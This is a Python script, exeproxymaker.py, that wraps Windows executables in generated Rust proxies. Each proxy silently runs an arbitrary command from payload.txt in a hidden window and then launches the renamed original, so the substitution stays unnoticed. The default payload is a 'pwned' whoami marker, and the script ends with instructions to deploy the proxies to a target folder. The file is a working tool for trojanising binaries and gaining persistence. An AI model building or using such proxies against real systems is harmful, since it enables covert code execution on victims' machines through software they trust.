#!/usr/bin/env python3
"""
exeproxymaker.py — EXE proxy generator.

Generates, for each input EXE, a Rust proxy that runs a payload on start
and then launches the renamed original with the same arguments.

Usage:
    exeproxymaker.py <input> [output] [--payload CMD]
                     [--keep-going] [--skip LIST]

Output layout (per EXE):
    <output>/<name>.exe           -> proxy
    <output>/<name>_orig.exe      -> renamed original
    <output>/payload.txt          -> command executed on proxy start

Architecture is taken from the original PE header so the proxy matches
the binary it replaces (x86 / x64 / ARM64).
"""

from __future__ import annotations

import argparse
import shutil
import subprocess
import sys
import tempfile
from pathlib import Path
from typing import Iterable, NamedTuple

try:
    import pefile
except ImportError:
    print("[!] Missing dependency: pefile. Install with: pip install pefile")
    sys.exit(1)


# ---------------------------------------------------------------------
#  Constants
# ---------------------------------------------------------------------

ARCH_MAP: dict[int, str] = {
    0x014C: "i686-pc-windows-msvc",
    0x8664: "x86_64-pc-windows-msvc",
    0xAA64: "aarch64-pc-windows-msvc",
}

DEFAULT_SKIP: tuple[str, ...] = ()
DEFAULT_PAYLOAD: str = r"whoami >> C:\Windows\Temp\pwned.txt"


# ---------------------------------------------------------------------
#  Templates
# ---------------------------------------------------------------------

CARGO_TOML_TEMPLATE = """\
[package]
name = "{pkg_name}"
version = "0.1.0"
edition = "2021"

[[bin]]
name = "proxy"
path = "src/main.rs"

[profile.release]
opt-level = "z"
lto = true
codegen-units = 1
panic = "abort"
strip = true
"""


MAIN_RS_TEMPLATE = r"""// Auto-generated by exeproxymaker.py — do not edit by hand.

use std::env;
use std::fs;
use std::os::windows::process::CommandExt;
use std::path::PathBuf;
use std::process::{Command, Stdio};

const ORIGINAL_EXE: &str = "__ORIGINAL_EXE__";
const CREATE_NO_WINDOW: u32 = 0x0800_0000;

fn exe_dir() -> PathBuf {
    env::current_exe()
        .ok()
        .and_then(|p| p.parent().map(|d| d.to_path_buf()))
        .unwrap_or_else(|| PathBuf::from("."))
}

fn run_payload(dir: &PathBuf) {
    let payload_path = dir.join("payload.txt");
    let Ok(cmd) = fs::read_to_string(&payload_path) else {
        return;
    };
    let cmd = cmd.trim();
    if cmd.is_empty() {
        return;
    }
    let _ = Command::new("cmd.exe")
        .arg("/c")
        .raw_arg(cmd)
        .creation_flags(CREATE_NO_WINDOW)
        .stdin(Stdio::null())
        .stdout(Stdio::null())
        .stderr(Stdio::null())
        .spawn();
}

fn main() {
    let dir = exe_dir();
    run_payload(&dir);

    let original = dir.join(ORIGINAL_EXE);
    let status = Command::new(&original)
        .args(env::args_os().skip(1))
        .status();

    match status {
        Ok(s) => std::process::exit(s.code().unwrap_or(1)),
        Err(_) => std::process::exit(1),
    }
}
"""


# ---------------------------------------------------------------------
#  Data structures
# ---------------------------------------------------------------------

class ExeInfo(NamedTuple):
    path: Path
    name: str
    target: str


class Result(NamedTuple):
    name: str
    reason: str


# ---------------------------------------------------------------------
#  CLI
# ---------------------------------------------------------------------

def _sanitise_pkg_name(base: str) -> str:
    out = []
    for ch in base:
        if ch.isascii() and (ch.isalnum() or ch in "-_"):
            out.append(ch)
        else:
            out.append("_")
    return "proxy_" + "".join(out)


def parse_args() -> argparse.Namespace:
    parser = argparse.ArgumentParser(
        description="Generate Rust-based EXE proxies that run a payload "
                    "and forward the original arguments.",
    )
    parser.add_argument(
        "input",
        help="EXE file or directory containing original EXEs",
    )
    parser.add_argument(
        "output",
        nargs="?",
        default=None,
        help="Output directory or EXE path (default: same folder as input)",
    )
    parser.add_argument(
        "--payload",
        default=DEFAULT_PAYLOAD,
        help=f"Command executed when a proxy starts (default: {DEFAULT_PAYLOAD!r})",
    )
    parser.add_argument(
        "--skip",
        default=",".join(DEFAULT_SKIP),
        help="Comma-separated list of substrings; matching EXEs are skipped",
    )
    parser.add_argument(
        "--keep-going",
        action="store_true",
        help="Continue processing remaining EXEs when one fails",
    )
    return parser.parse_args()


# ---------------------------------------------------------------------
#  PE inspection
# ---------------------------------------------------------------------

def inspect_exe(path: Path) -> ExeInfo:
    pe = pefile.PE(str(path), fast_load=True)
    try:
        machine = pe.FILE_HEADER.Machine
        target = ARCH_MAP.get(machine)
        if target is None:
            raise ValueError(f"Unsupported architecture: 0x{machine:X}")
    finally:
        pe.close()

    return ExeInfo(path=path, name=path.name, target=target)


# ---------------------------------------------------------------------
#  Code generation
# ---------------------------------------------------------------------

def escape_rust_string(value: str) -> str:
    out: list[str] = []
    for ch in value:
        code = ord(ch)
        if ch == "\\":
            out.append("\\\\")
        elif ch == '"':
            out.append('\\"')
        elif 0x20 <= code < 0x7F:
            out.append(ch)
        else:
            out.append(f"\\x{code:02x}")
    return "".join(out)


def render_main_rs(original_exe_name: str) -> str:
    return MAIN_RS_TEMPLATE.replace(
        "__ORIGINAL_EXE__", escape_rust_string(original_exe_name)
    )


# ---------------------------------------------------------------------
#  Cargo project handling
# ---------------------------------------------------------------------

def prepare_project(workdir: Path, exe_name: str, main_rs: str) -> Path:
    base = exe_name[:-4]
    proj = workdir / base
    if proj.exists():
        shutil.rmtree(proj)
    (proj / "src").mkdir(parents=True)

    (proj / "Cargo.toml").write_text(
        CARGO_TOML_TEMPLATE.format(pkg_name=_sanitise_pkg_name(base)),
        encoding="utf-8",
    )
    (proj / "src" / "main.rs").write_text(main_rs, encoding="utf-8")
    return proj


def build_project(proj: Path, target: str) -> Path:
    result = subprocess.run(
        ["cargo", "build", "--release", "--target", target],
        cwd=proj,
        capture_output=True,
        encoding="utf-8",
        errors="replace",
    )

    if result.returncode != 0:
        print("[!] cargo build failed:")
        print(result.stdout or "")
        print(result.stderr or "")
        raise RuntimeError("cargo build failed")

    release_dir = proj / "target" / target / "release"
    proxy = release_dir / "proxy.exe"
    if not proxy.exists():
        candidates = list(release_dir.glob("*.exe"))
        candidates = [c for c in candidates if c.name != "proxy.d"]
        if not candidates:
            raise RuntimeError(f"No compiled .exe found under {release_dir}")
        proxy = candidates[0]
    return proxy


# ---------------------------------------------------------------------
#  Orchestration
# ---------------------------------------------------------------------

def should_skip(name: str, skips: Iterable[str]) -> str | None:
    lower = name.lower()
    if lower.endswith("_orig.exe"):
        return "already a _orig.exe"
    for needle in skips:
        if needle in lower:
            return f"matches skip pattern ({needle})"
    return None


def process_one(
    exe_path: Path,
    out_dir: Path,
    workroot: Path,
    dest_name: str | None = None,
) -> ExeInfo:
    info = inspect_exe(exe_path)
    print(f"[*] {info.name}: target={info.target}")

    proxy_name = dest_name or info.name
    base = Path(proxy_name).stem
    original_name = f"{base}_orig.exe"

    main_rs = render_main_rs(original_name)
    project = prepare_project(workroot, info.name, main_rs)
    built_proxy = build_project(project, info.target)

    (out_dir / original_name).write_bytes(exe_path.read_bytes())
    shutil.copy2(built_proxy, out_dir / proxy_name)

    print(f"    [+] OK -> {proxy_name} + {original_name}")
    return info


def print_summary(
    ok: list[str],
    skipped: list[Result],
    failed: list[Result],
    out_dir: Path,
) -> None:
    print("\n========== SUMMARY ==========")
    print(f"Succeeded: {len(ok)}")
    print(f"Skipped:   {len(skipped)}")
    print(f"Failed:    {len(failed)}")

    if skipped:
        print("\nSkipped:")
        for item in skipped:
            print(f"  - {item.name}: {item.reason}")
    if failed:
        print("\nFailed:")
        for item in failed:
            print(f"  - {item.name}: {item.reason}")

    print(f"\n[+] Output directory: {out_dir}")
    print("[+] Deploy by copying *.{exe} and payload.txt to the target folder")
    print("[+] Reminder: payload.txt must sit alongside the EXEs at runtime")


def resolve_io(input_path: Path, output: str | None, ext: str):
    """Return (files, out_dir, dest_name). dest_name is set only for a single output file."""
    if input_path.is_file():
        if input_path.suffix.lower() != ext:
            raise ValueError(f"Input file must be a {ext}: {input_path}")
        files = [input_path]
        default_dir = input_path.parent
    elif input_path.is_dir():
        files = sorted(input_path.glob(f"*{ext}"))
        default_dir = input_path
    else:
        raise FileNotFoundError(f"Input does not exist: {input_path}")

    if not output:
        return files, default_dir, None

    dest = Path(output)
    if dest.exists() and dest.is_dir():
        return files, dest.resolve(), None
    if dest.suffix.lower() == ext:
        if len(files) != 1:
            raise ValueError("Output file is only valid when processing a single input file")
        dest = dest.resolve()
        dest.parent.mkdir(parents=True, exist_ok=True)
        return files, dest.parent, dest.name

    return files, dest.resolve(), None


def main() -> int:
    args = parse_args()

    try:
        exes, out_dir, dest_name = resolve_io(
            Path(args.input).resolve(), args.output, ".exe"
        )
    except (FileNotFoundError, ValueError) as exc:
        print(f"[!] {exc}")
        return 1

    out_dir.mkdir(parents=True, exist_ok=True)

    skips = tuple(s.strip().lower() for s in args.skip.split(",") if s.strip())

    (out_dir / "payload.txt").write_text(args.payload + "\n", encoding="utf-8")
    print(f"[+] payload.txt written to {out_dir}")

    print(f"[+] {len(exes)} EXE(s) to process")

    workroot = Path(tempfile.mkdtemp(prefix="exeproxy_"))
    print(f"[+] Temporary workspace: {workroot}\n")

    succeeded: list[str] = []
    skipped: list[Result] = []
    failed: list[Result] = []

    for exe_path in exes:
        reason = should_skip(exe_path.name, skips)
        if reason is not None:
            skipped.append(Result(exe_path.name, reason))
            continue

        try:
            info = process_one(exe_path, out_dir, workroot, dest_name)
            succeeded.append(info.name)
        except Exception as exc:
            failed.append(Result(exe_path.name, str(exc)))
            print(f"    [!] FAILED: {exc}")
            if not args.keep_going:
                print("[!] Aborting (use --keep-going to continue)")
                break

    print_summary(succeeded, skipped, failed, out_dir)
    return 0 if not failed else 2


if __name__ == "__main__":
    sys.exit(main())
